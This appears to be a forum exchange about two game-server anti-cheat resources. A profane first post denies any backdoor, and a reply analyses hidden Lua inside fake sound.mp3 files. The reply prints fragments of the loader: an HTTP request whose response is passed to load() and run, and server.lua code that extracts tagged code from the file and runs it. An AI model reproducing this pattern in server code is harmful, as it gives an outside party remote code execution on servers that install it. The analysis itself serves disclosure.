there is no backdoor on there as i have checked them bot the only PerformHttpRequest is built in by the creators of the anti-cheats u dumb mothafucka
sure sure haha in both ACs is the same backdoor with the fake mp3 haha
Backdoor #1 — Hidden payload inside sound.mp3 (both resources)
Both Godzilla/sound.mp3 and wave-anticheat/sound.mp3 are
fake MP3 files with Lua code hidden inside them between special tags. The hidden code is identical in both:
PerformHttpRequest("
", function(a, b)
assert(load(b))()
downloads and executes WHATEVER that server sends back
then a
Remote Code Execution backdoor it phones home to an external server and runs any code the attacker sends. The attacker can change what it does at any time.
Backdoor #2 — Both server.lua files load the hidden payload
-- In Godzilla/server.lua and wave-anticheat/server.lua
local fichier = io.open(filePath, "r") -- opens sound.mp3
-- extracts code between [Start SmartINF] ... [End SmartINF]
assert(load(code))() -- executes it on your server